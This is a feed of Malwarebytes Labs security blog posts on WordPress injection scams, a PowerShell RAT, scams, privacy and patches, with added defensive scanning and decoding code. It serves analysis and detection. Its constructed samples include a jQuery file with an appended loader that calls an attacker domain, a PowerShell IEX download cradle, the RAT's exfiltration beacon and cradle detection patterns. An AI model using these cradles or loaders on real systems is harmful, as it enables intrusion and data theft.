The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue: the threat actors injected malicious JavaScript into the affected website’s files and database. On each compromised site the attackers attempted to automatically infect any .js file with “jquery” in its name, appending obfuscated code to it when successful. The malicious JavaScript was appended after the legitimate script, or placed in the head of the page, so that it fired on every page load and redirected site visitors to a destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate’s traffic which flowed through the same local[.]drakefollow[.]com subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but might as well have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.
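One way a site owner or responder could triage a WordPress install for this injection, as an added example that is not part of the Sucuri or Malwarebytes write-ups: walk the install, pick out the .js files with “jquery” in the name that this campaign targets, and flag appended loader code and script sources outside the site’s own hosts. The indicator patterns, the host allowlist and the sample file below are ours; drakefollow.com is the redirect hop named above, and the loader.js path under it is hypothetical.

```python
import re
from pathlib import Path
from typing import Iterator

# Redirect hop named in the write-up; everything else in this scanner is our own heuristic.
KNOWN_BAD_DOMAINS = {"drakefollow.com"}

# Generic markers of an injected loader: decode-and-run tricks, escape-sequence
# blobs, dynamically created script tags and forced redirects.
INDICATORS = [
    ("decode-and-run", re.compile(r"\beval\s*\(|\batob\s*\(|String\.fromCharCode", re.I)),
    ("escape-sequence blob", re.compile(r"(?:\\x[0-9a-f]{2}){8,}|(?:\\u[0-9a-f]{4}){8,}", re.I)),
    ("dynamic script tag", re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I)),
    ("forced redirect", re.compile(r"(?:window|document|top)\.location(?:\.href)?\s*=", re.I)),
]
# Captures (full URL, host) from a script src assignment or attribute.
SRC_RE = re.compile(r"""src\s*=\s*['"]?((?:https?:)?//([^/'"\s]+)[^'"\s]*)""", re.I)


def _is_known_bad(host: str) -> bool:
    """True for a campaign domain or any subdomain of one (local.drakefollow.com etc.)."""
    return any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS)


def scan_source(source: str, own_hosts: set) -> list:
    """Scan one file's text (a .js file, or an HTML/database dump) and return findings.

    own_hosts is the allowlist of hosts the site legitimately loads scripts from;
    any other script source is reported so a human can review it.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, rx in INDICATORS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "label": label, "detail": m.group(0)})
        for url, host in SRC_RE.findall(line):
            host = host.lower()
            if _is_known_bad(host):
                findings.append({"line": lineno, "label": "known campaign domain", "detail": url})
            elif host not in own_hosts:
                findings.append({"line": lineno, "label": "third-party script host", "detail": url})
    return findings


def scan_tree(root: Path, own_hosts: set) -> Iterator:
    """Walk a WordPress install and scan every .js file with 'jquery' in its name,
    the files this campaign went after; yields (path, findings) for files with hits."""
    for path in root.rglob("*.js"):
        if "jquery" in path.name.lower():
            findings = scan_source(path.read_text(encoding="utf-8", errors="replace"), own_hosts)
            if findings:
                yield path, findings


# Constructed sample (our illustration, not the campaign's actual code): a minified-style
# jQuery header with a loader appended after the library. The script name is assembled
# from character codes, so only the decode marker and the domain give it away.
SAMPLE_INFECTED = (
    "/*! jQuery v3.6.0 | (c) OpenJS Foundation | jquery.org/license */\n"
    "!function(e,t){\"use strict\";t(e)}(window,function(w){return w.jQuery=w.$={}});\n"
    "var _0x1a=String.fromCharCode(115,99,114,105,112,116);var s=document.createElement(_0x1a);"
    "s.src='//local.drakefollow.com/js/loader.js';document.head.appendChild(s);\n"
)
SAMPLE_CLEAN = SAMPLE_INFECTED.split("var _0x1a")[0]

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_INFECTED, {"www.example-site.test"}):
        print(finding)
```

Run it against a real install with `for path, hits in scan_tree(Path("/var/www/html"), {"www.example-site.test"}): ...`; the allowlist is what turns a noisy "every external script" report into a short one, because legitimate CDNs are listed once and everything else is a lead.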

Traffic flow from compromised WordPress site to rogue affiliate’s site

The fake CAPTCHA

At this point in the chain of redirections the fake reCAPTCHA sites kick in, as the final step in duping the visitor. The unsuspecting visitor lands on a site that tries to trick them into accepting push notifications from the landing page’s domain.

fake reCAPTCHA

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

By design, push notifications look similar across operating systems and browsers: they appear outside the browser window, in the operating system’s own notification area (on Windows, above the taskbar at the bottom right). That is misleading, because they can seem to originate from the operating system itself. Telling a web push notification apart from an alert that comes from the operating system or another program installed on the device is hard, and that makes it difficult for the unsuspecting user of an affected system to understand what is going on.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

Removal and mitigation

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

Special thanks to the Malwarebytes Threat Intelligence Team for their contribution and the screenshot

The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Malwarebytes - Mon, 05/16/2022 - 10:00

This blog post was authored by Hossein Jazi and Jérôme Segura

Populations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.

Although all countries have reasons to be concerned, the situation in Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.

This week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact a decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

Decoy site lures victims with Ukraine situation

Threat actors registered an expired German domain name, collaboration-bw[.]de, that was formerly used as a collaboration platform for developing new ideas for the state of Baden-Württemberg.

Threat actors registered an expired domain associated with Baden-Württemberg

The threat actors used the domain to host a website that looked like the official Baden-Württemberg website.

A comparison of the real (top) and the malicious fake (bottom)

With this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: a file tantalisingly called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.

The website promises important information and tips about the Ukraine crisis

An English translation of the page reads:

Important, current threat situation regarding the Ukraine crisis

On this website you will always find the most important information and tips for dealing with the current threat posed by the Ukraine crisis. Please download the document now and read through the current information. The document is constantly updated and is up to date. Our suggested tips can be practically implemented in everyday work and you should already implement them today. Thanks for your support.

File analysis

The archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.

The CHM file displays a fake error message

Victims get a fake error message when they open that file, while PowerShell quietly runs a Base64-encoded command in the background.

PowerShell executes a Base64-encoded command

After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).

The PowerShell code fetches and executes a malicious script

The malicious script downloaded from the fake Baden-Württemberg website
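A small decoder for this kind of command line, as an added example (our code, not the campaign’s stage one and not Malwarebytes tooling). PowerShell’s -EncodedCommand takes the script as UTF-16LE text and then Base64-encodes it, which is why feeding such a blob to a plain Base64 decoder yields letters separated by null bytes. The helper handles that, falls back to UTF-8 for blobs that droppers pass to [Convert]::FromBase64String instead, and then flags download-cradle markers and URLs in the recovered script. The sample command line, the stage2.ps1 path and the marker list are ours; only the collaboration-bw.de domain comes from the article, and nothing here connects to it.

```python
import base64
import re

# Download-cradle and evasion markers a defender looks for; generic, not strings from the sample.
CRADLE_PATTERNS = {
    "Invoke-Expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "WebClient download": re.compile(r"net\.webclient|downloadstring|downloadfile", re.I),
    "Invoke-WebRequest": re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(?:p|x(?:ecutionpolicy)?)\s+bypass", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# -e, -ec, -en, -enc and -EncodedCommand are all accepted abbreviations.
ENCODED_ARG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell_command(script: str) -> str:
    """Produce what -EncodedCommand expects: the script as UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Decode a Base64 blob taken from a PowerShell command line.

    -EncodedCommand is always UTF-16LE, but droppers also feed UTF-8 Base64 to
    [Convert]::FromBase64String, so fall back to UTF-8 when the UTF-16LE reading is
    invalid (odd byte count) or turns mostly into non-ASCII characters.
    """
    raw = base64.b64decode(blob, validate=True)
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and sum(ch.isascii() for ch in text) / len(text) >= 0.9:
            return text
    raise ValueError("blob decodes to neither UTF-16LE nor UTF-8 text")


def analyse_command_line(cmdline: str) -> dict:
    """Decode any -enc argument and report cradle markers and URLs for the whole command."""
    m = ENCODED_ARG_RE.search(cmdline)
    script = decode_powershell_command(m.group(1)) if m else ""
    # Drop the Base64 blob before matching so its random letters cannot trigger a marker.
    visible = ENCODED_ARG_RE.sub(" ", cmdline) + "\n" + script
    markers = [label for label, rx in CRADLE_PATTERNS.items() if rx.search(visible)]
    return {"encoded": m is not None, "script": script, "markers": markers, "urls": URL_RE.findall(visible)}


# Constructed stand-in for the stage-one command (the real blob is not reproduced here):
# a one-liner that pulls a script from the lookalike domain and pipes it to IEX.
# The stage2.ps1 path is hypothetical.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://collaboration-bw.de/stage2.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_powershell_command(SAMPLE_SCRIPT)
# The same script as UTF-8 Base64, the form a [Convert]::FromBase64String stager would carry.
SAMPLE_UTF8_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")

if __name__ == "__main__":
    print(analyse_command_line(SAMPLE_CMDLINE))
```

In practice the command line comes from process-creation telemetry (Sysmon event 1, or 4688 with command-line auditing on); the parent being hh.exe, as in this chain, is the other half of the detection.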

The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.

Finally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.

PowerShell RAT (Status.txt)

Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.

This data is exfiltrated as a JSON data structure sent to the server via a POST request:

$json = '{ "type": "newclient", "result": "", "pwd": "' + $pwd_b64 + '", "cuser": "' + $cuser + '", "hostname": "' + $hname + '", "clientid": "' + $clientid + '" }';
$headers = @{'X-Request-ID' = $strhash;}

However, before sending this request the script first bypasses the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass, which is decrypted with a generated key and IV before execution.

The bypass function that contains the encrypted script to bypass AMSI

The content of the AMSI bypass script after decryption

This RAT has the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
  • Command (type: C0MM4ND): Execute a specific command
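What a detection engineer could do with the beacon format and the tasking types above, as an added example (our code, not the RAT’s and not a Malwarebytes signature): take a captured POST from proxy or web-server logs, confirm it carries the X-Request-ID header and the newclient field set, recover the Base64 working directory, and map a tasking type back to the capability it exercises. It assumes the pwd field is UTF-8 before Base64 encoding and that the header value is arbitrary; the sample request is constructed.

```python
import base64
import json
from typing import Optional

# Field set the write-up shows for the "newclient" check-in.
NEWCLIENT_FIELDS = {"type", "result", "pwd", "cuser", "hostname", "clientid"}

# Tasking types the RAT understands, as listed above (leetspeak tokens).
TASK_TYPES = {
    "D0WNl04D": "download a file from the server",
    "UPL04D": "upload a file to the server",
    "L04DPS1": "load and execute a PowerShell script",
    "C0MM4ND": "execute a command",
}


def parse_beacon(headers: dict, body: str) -> Optional[dict]:
    """Return the decoded check-in if (headers, body) match this RAT's beacon, else None."""
    if "x-request-id" not in {k.lower() for k in headers}:
        return None
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict) or not NEWCLIENT_FIELDS <= set(data) or data["type"] != "newclient":
        return None
    try:
        cwd = base64.b64decode(data["pwd"], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        cwd = None  # keep the hit even if the operator changed the pwd encoding
    return {"clientid": data["clientid"], "user": data["cuser"], "hostname": data["hostname"], "cwd": cwd}


def classify_task(task_type: str) -> str:
    """Map a tasking type from the server to the capability it exercises."""
    return TASK_TYPES.get(task_type, "unknown")


# Constructed sample request: header value, user, host, directory and clientid are made up.
SAMPLE_HEADERS = {"Content-Type": "application/json", "X-Request-ID": "c0ffee"}
SAMPLE_BODY = json.dumps({
    "type": "newclient", "result": "",
    "pwd": base64.b64encode(b"C:\\Users\\alice").decode("ascii"),
    "cuser": "alice", "hostname": "DESKTOP-01", "clientid": "a1b2c3",
})

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_HEADERS, SAMPLE_BODY))
    print(classify_task("L04DPS1"))
```

The superset check (rather than an exact field match) keeps the rule alive if the operator adds a field; the header check is what separates this beacon from the many legitimate JSON POSTs that happen to contain a hostname.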

German command and control server

The attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name, kleinm[.]de, to avoid suspicion.

It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.

The Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.

Indicators of Compromise (IOCs)

Phishing site

MITRE ATT&CK

Tactic            ID     Name                                          Description
Execution         T1059  Command and Scripting Interpreter             Starts cmd.exe to run hh.exe; runs a PowerShell command that downloads and executes a script
Persistence       T1053  Scheduled Task/Job                            Uses the task scheduler to add MonitorHealth.cmd as a daily task
Defense evasion   T1222  File and Directory Permissions Modification   Uses attrib.exe to hide the SecuriyHealthService folder

The post Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to spot the signs of a virtual kidnap scam

Malwarebytes - Sun, 05/15/2022 - 20:06

Threats and bluster play a key role in most online attacks: Ransomware has its ransom note; trolls threaten to ramp up the pressure; tech support scammers insist your PC needs urgent assistance.

Some take it a step further, leaning in with a more direct approach, ranging from death threats to sextortion, and even kidnap claims. These tactics have been around for a very long time. You can reach back to 2007 and look in amazement at the 419 death threat. In 2013, we had pretend hitmen threatening murder unless victims paid $25,000 to survive their non-existent wrath.

An example of the kidnapping variety is currently in the news, and it’s well worth familiarising yourself with it.

The virtual kidnap: Step by step

Kidnap scams involve making a phone call to a victim and telling them a loved one has been taken. Threats of violence soon follow, unless a ransom—typically in the form of a wire transfer—is paid. The most disturbing aspect of these calls is that scammers play recordings of screams in the background.

One horribly fascinating aspect of this crime is that panic and adrenaline can convince victims that the voice they hear is that of their son, daughter, spouse, and so on. You see this time and time again. In that kind of high-stakes, high-pressure scenario, who can blame them?

Things become even worse when social engineering combines with publicly available data to make it even more convincing.

Profiling the victim

Victims of the most recent virtual kidnap attempt likely had some of their information used against them in the call. Scammers pretended to have someone’s mother held hostage, with the threat of never seeing her again. Sadly, the ruse was made more convincing because the caller ID displayed as the recipient’s mother’s phone number. Somehow, somewhere, they were able to connect the two relatives and their cell numbers.

The already convincing impact of the scream recording would be amplified by the recognisable number. At this point, it’s already game over. The fraudster on this occasion asked for money to be sent through Venmo. We see criminals gravitating to digital payment systems, cryptocurrencies, and even gift cards across most realms of attack. Wire fraud is still big business, but digital transfers are appealing to those wanting to make a quick getaway.

On this occasion, the victim is $900 out of pocket and that’s before we consider the significant psychological impact of a supposed kidnap phone call.

Tips to avoid virtual kidnapping attempts

This is clearly an incredibly disturbing thing to have happen, and plenty of tactics to combat this crime have developed this past decade. FBI Chicago released several good pieces of advice in March, which take into account the social engineering side of things:

  • Never post news of upcoming travel dates and locations online.
  • Discuss virtual kidnapping with family members prior to any travel.
  • Have a “password” that family members can use to confirm a loved one is really in trouble.
  • Be wary of providing financial information to strangers over the phone.

Some of the other tips focus mainly on bogus wire transfers. As we see above, criminals are happy to use other methods to swipe ill-gotten gains. Not being able to describe the victim is another good tip, but how many people would risk asking this in the heat of the moment? Would you really want to upset a kidnapper and have them just hang up because you said the wrong thing?

Keeping cell phone numbers private on any website is a must. Posting photos of your vacation in real time? Set up a private Instagram and share it with close friends and family only. Don’t leave contact details of family members stored in easily compromised email accounts. Lock them down with whatever additional methods are to hand: two-factor authentication and password managers are good places to start.

Nobody wants a late night call claiming a loved one is being held hostage. Having said that, if the worst happens? Keep cool, take a deep breath, and work your way through the above suggestions. It’s almost certainly an astonishingly malicious piece of fakery.

The post How to spot the signs of a virtual kidnap scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Virtual credit cards coming to Chrome: What you need to know

Malwarebytes - Thu, 05/12/2022 - 15:38

When you’re buying things online, reducing the exposure of payment details during transactions is one way to help reduce the risk of data theft. If you can hide this payment data and switch it out for something else entirely, even better.

Google is proposing to do just that for customers in the US, with recently announced plans to offer a virtual credit card service for Chrome.

What is a virtual credit card?

The concept of virtual credit cards has been around for some time now. But with Google proposing to start using virtual credit cards, more people are likely to start talking about them.

Have you ever used a disposable email alias, or a VoIP service which displays a number of your choosing? These are ways you can keep your most personal information safe from prying eyes. Going one step further, it can be a valuable tool to pin down who’s had a breach, and who voluntarily leaks your data. If you create an email alias for every service you use, you’ll know the moment something has happened if the alias shows up in a dump or you receive spam on it.

Virtual credit card numbers share a few of these traits. Your actual card number never goes online. In its place is a variety of virtual numbers generated by your card provider connected to your account. These numbers may well expire at a set period in the future like real ones, so you don’t have to worry about an ever-increasing set of virtual details gathering dust in the corner.

Years ago, when I first started going to security conferences overseas, my bank card wasn’t accepted in most of the cities I visited. A stop-gap solution to this was someone buying me a bunch of pre-paid credit cards. This helped keep my real card safe. Virtual cards are like a significantly more advanced version of pre-pay efforts. When I used them, some pre-paid cards had a cap on funds allocated so you had to buy several at a time, and they also expired if you didn’t use the money within a certain time period.

Good news: You don’t have to worry about any of this with a virtual card number.

What is Chrome offering to US based users?

Here’s what Google has to say on the subject:

As people do more shopping online, keeping payment information safe and secure is critically important. We’re launching virtual cards on Chrome and Android. When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number. This eliminates the need to manually enter card details like the CVV at checkout, and they’re easy to manage at — where you can enable the feature for eligible cards, access your virtual card number, and see recent virtual card transactions. Virtual cards will be rolling out in the US for Visa, American Express, Mastercard and all Capital One cards starting this summer.

According to TechCrunch, Google “will not use any of this information for ad targeting purposes”. It remains to be seen if or when this rollout will extend to regions outside of the US.

Keeping you safe, and saving you time

The aim of the game is to make it harder for fraudsters to obtain your genuine details. Losing your card data to a skimming attack on a hijacked site, or having it swiped from a database, is a huge pain. Phone calls and cancelled cards await.

I myself have had credit card details compromised. To this day, I have no idea how or where it happened. I only know that it involved a spectacular amount of wine. It happened during a rather complicated long distance house move, and having to sink time into calling fraud teams, cancelling the card I really could have done with for the move, and having a replacement card almost sent to the wrong address by mistake was really not great.

Yet these are the additional complications any sort of compromise routinely throws up. It’s never “just” the card details. If I’d had a virtual card number when the great wine heist of 2016 took place, it wouldn’t have mattered at all. I could have just switched to a new virtual number and been done. No card replacement required.

Tightening the grip on bogus transactions

Banks are increasingly ramping up checks made when trying to buy items online. Seeing a Verified by Visa popup, or a request to use an authenticator device, is fairly common. These tactics appear to be working. One bank reported 2,000 fewer cases of card fraud per month after the introduction of new payment checks.

Elsewhere, Apple Pay is serious about enhancing fraud prevention features. Location specific features (should you have them enabled) will help shut down rogue payment attempts.

A recent report claims card fraud losses could hit around $408.50 billion globally over the next decade. These are huge numbers to contend with. We’re going to need every tool available to chip away at that number. Whether you’re using virtual numbers, pre-loaded cards, or another method altogether for real world payments, having so many options available can only be a good thing.

The post Virtual credit cards coming to Chrome: What you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Clearview AI banned from selling facial recognition data in the US

Malwarebytes - Thu, 05/12/2022 - 15:22

Clearview AI, a facial recognition software and surveillance company, is permanently banned from selling its faceprint database within the United States. The company also cannot sell its database to state and law enforcement entities in Illinois for five years.

This is a historic win for the American Civil Liberties Union (ACLU). This nonprofit organization filed a lawsuit against Clearview in 2020, alleging the company has built its business around secretly taking facial recognition data from people without consent.

“By requiring Clearview to comply with Illinois’ pathbreaking biometric privacy law not just in the state, but across the country, this settlement demonstrates that strong privacy laws can provide real protections against abuse,” said Nathan Freed Wessler (@NateWessler), Deputy Director of the ACLU’s Speech, Privacy, and Technology Project, in a statement.

“Clearview can no longer treat people’s unique biometric identifiers as an unrestricted source of profit. Other companies would be wise to take note, and other states should follow Illinois’ lead in enacting strong biometric privacy laws.”

Clearview AI was known for scraping images of people from social networking sites, particularly Facebook, YouTube, Venmo, and other websites. According to a New York Times expose, Clearview’s app can show you additional photos of a person—after taking a snap of them—along with links to where these appeared.

Knowing this, a San Francisco Bay Area photographer and writer named Thomas Smith requested all his data from Clearview. And what came back, he said, freaked him out.

Under the settlement agreement, Clearview must also have an opt-out feature available on its website for Illinois residents so their faceprints can stop appearing in Clearview search results. They are further barred from offering free access to individual police officers without the approval of their respective departments.

The post Clearview AI banned from selling facial recognition data in the US appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cyberattacks on SATCOM networks attributed to Russian threat actors

Malwarebytes - Thu, 05/12/2022 - 13:22

The Cybersecurity & Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have updated their joint cybersecurity advisory, Strengthening Cybersecurity of SATCOM Network Providers and Customers, originally released March 17, 2022, with US government attribution to Russian state-sponsored malicious cyberactors.

Critical infrastructure

When we touched on the subject a few months ago, we explained why we think satellites are critical infrastructure. Commercial satellites provide us with the ability to establish services like Internet access, television, GPS, and scientific information about the weather and other processes in the atmosphere and on the surface.

On March 17, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published an alert in conjunction with the Federal Bureau of Investigation (FBI) which warned of possible threats to US and international satellite communication (SATCOM) networks.

Along with that alert came a report that provided mitigation strategies for SATCOM providers and their customers. And, as part of CISA’s Shields Up initiative, all organizations are being asked to significantly lower their threshold for reporting and sharing indications of malicious cyberactivity.

Spillover

The United States believes Russia launched cyberattacks in late February against commercial satellite communications networks to disrupt Ukrainian command and control during the Russian invasion, and those actions had spillover impacts into other European countries.

In the months leading up to and after Russia’s invasion began, Ukraine experienced a series of disruptive cyber operations, including website defacements, distributed denial-of-service (DDoS) attacks, and cyberattacks to delete data from computers belonging to government and private entities.

For example, the United States has assessed that Russian military cyber operators have deployed multiple families of destructive wiper malware, like HermeticWiper, on Ukrainian Government and private sector networks.

Now, the US is sharing publicly its assessment that Russia launched cyberattacks in late February against commercial satellite communications networks to disrupt Ukrainian command and control during the invasion, and those actions had spillover impacts into other European countries.


In order to uphold the rules-based international order in cyberspace, the US and its allies and partners are taking steps to defend against Russia’s actions. The US government has developed new mechanisms to help Ukraine identify cyberthreats and recover from cyberincidents.

CISA has exchanged technical information on cybersecurity threats related to Russia’s further invasion of Ukraine with key partners, including Ukraine.

Mitigation guidance

On March 17, 2022, CISA issued an alert providing technical details and mitigation guidance on possible threats to US and international SATCOM networks. A quick recap:

  • Use secure methods for authentication.
  • Enforce principle of least privilege through authorization policies.
  • Review existing trust relationships with IT service providers.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider.
  • Strengthen the security of operating systems, software, and firmware, including vulnerability and patch management.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Create, maintain, and exercise a cyberincident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.

Stay safe, everyone!


F5 BIG-IP vulnerability is now being used to disable servers

Malwarebytes - Thu, 05/12/2022 - 12:51

As we reported a few days ago, an F5 BIG-IP vulnerability listed as CVE-2022-1388 is actively being exploited. But now researchers have noticed that attackers aren’t just taking control of the vulnerable servers but also making them unusable by destroying the device’s file system.


The BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.

On May 4, 2022 F5 notified users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.

Soon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.

Due to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.

New type of attack

While most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attack.

At least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which is breaking load balancing and websites.

Attackers are wiping vulnerable devices’ file systems

While destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable for threat actors that are trying to utilize the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts used by an attacker that allow them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

The motives of this threat actor are hard to guess. Maybe it’s simply a case of showing off, or an act out of sheer frustration.

But for those running a vulnerable device this makes the “can’t patch now, for it will make the device unavailable” argument moot. If this attacker gets to you, the device will be unavailable for much longer than it takes to patch.

Stay safe, everyone!


College closes down after ransomware attack

Malwarebytes - Thu, 05/12/2022 - 10:21

Lincoln College, one of the few rural schools in Illinois, said that it will permanently close on Friday, May 13, after 157 years, partly due to the impacts of the COVID-19 pandemic and partly due to a long recovery after a ransomware attack in December 2021. The institution notified the Illinois Department of Higher Education and Higher Learning Commission and posted a goodbye note on its website.

“Lincoln College has survived many difficult and challenging times – the economic crisis of 1887, a major campus fire in 1912, the Spanish flu of 1918, the Great Depression, World War II, the 2008 global financial crisis, and more, but this is different. Lincoln College needs help to survive.”

The institution struggled during the ongoing pandemic and a December 2021 ransomware attack only challenged it further. Lincoln said the attack “thwarted admissions activities and hindered access to all institutional data, creating an unclear picture of Fall 2022 enrollment projections”.

“All systems required for recruitment, retention, and fundraising efforts were inoperable. Fortunately, no personal identifying information was exposed. Once fully restored in March 2022, the projections displayed significant enrollment shortfalls, requiring a transformational donation or partnership to sustain Lincoln College beyond the current semester.”

The closing of a US college or university marks another first in ransomware attack history. Kim Milford, director of the Research and Education Networks Information Sharing and Analysis Center (REN-ISAC), told NBC News, which first broke the story, that a school closing only underscores the toll a ransomware attack can take on its victim. “I feel really bad for Lincoln College and wish there was some way we could help, but it can be a very expensive proposition when you’re hit by ransomware,” she said.

How to avoid ransomware attacks

  1. Require the use of multi-factor authentication (MFA). It might feel like a bother, but MFA is relatively easy to set up, and it doesn’t disrupt normal day-to-day activities.
  2. Install security software on all systems. Use one that offers multiple layers of protection against online threats, especially ransomware.
  3. Patch as soon as you can. Universities rely on various software for various tasks. Keeping it all up-to-date means cybercriminals can’t exploit existing and known flaws.
  4. Promote awareness for all faculty members and staff. Educating university employees to help them understand their part in protecting the university from cyberattacks is essential. Remember that this is every faculty, school staff, and students’ responsibility, not just the people in IT.
  5. Back up your files. When it comes to ransomware attacks, this is one of the pieces of advice we give out. But as we found out, you have to know how to back things up properly. This episode of our Lock and Code podcast, in which we talk with Matt Crape, technical account manager at VMware, about why backups fail us when we need them the most, is worth a listen.

If you want to read more about how to protect yourself from a ransomware attack, or how to recover if you are in the midst of one, download our Ransomware Emergency Kit.


Update now! Microsoft releases patches, including one for actively exploited zero-day

Malwarebytes - Wed, 05/11/2022 - 14:36

Microsoft has released patches for 74 security problems, including fixes for seven “critical” vulnerabilities, and an actively exploited zero-day vulnerability that affects all supported versions of Windows.

First, we’ll look at the actively exploited zero-day. Then we’ll discuss two zero-days that are publicly disclosed, but for which no in-the-wild exploits have been reported so far. And we’ll finish off with a few others that are worth keeping an eye on.

LSA spoofing zero-day

Microsoft has addressed an actively exploited Windows LSA spoofing zero-day that allows unauthenticated attackers to remotely force domain controllers to authenticate them via the Windows NT LAN Manager (NTLM) security protocol.

CVE-2022-26925: An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. The security update detects anonymous connection attempts in LSARPC and disallows them.

LSA (short for Local Security Authority) is a protected Windows subsystem that enforces local security policies and validates users for local and remote sign-ins. LSARPC is a protocol that enables a set of remote procedure calls (RPCs) to the LSA. Microsoft warns that the CVSS score would be 9.8 out of 10 when this vulnerability is chained with the noted NTLM Relay Attacks on Active Directory Certificate Services (AD CS).

The attack vector is closely related to the PetitPotam attacks we saw last year. If you are deciding which patches to prioritize: this vulnerability affects all servers, but domain controllers should be patched first.

Windows Hyper-V vulnerability

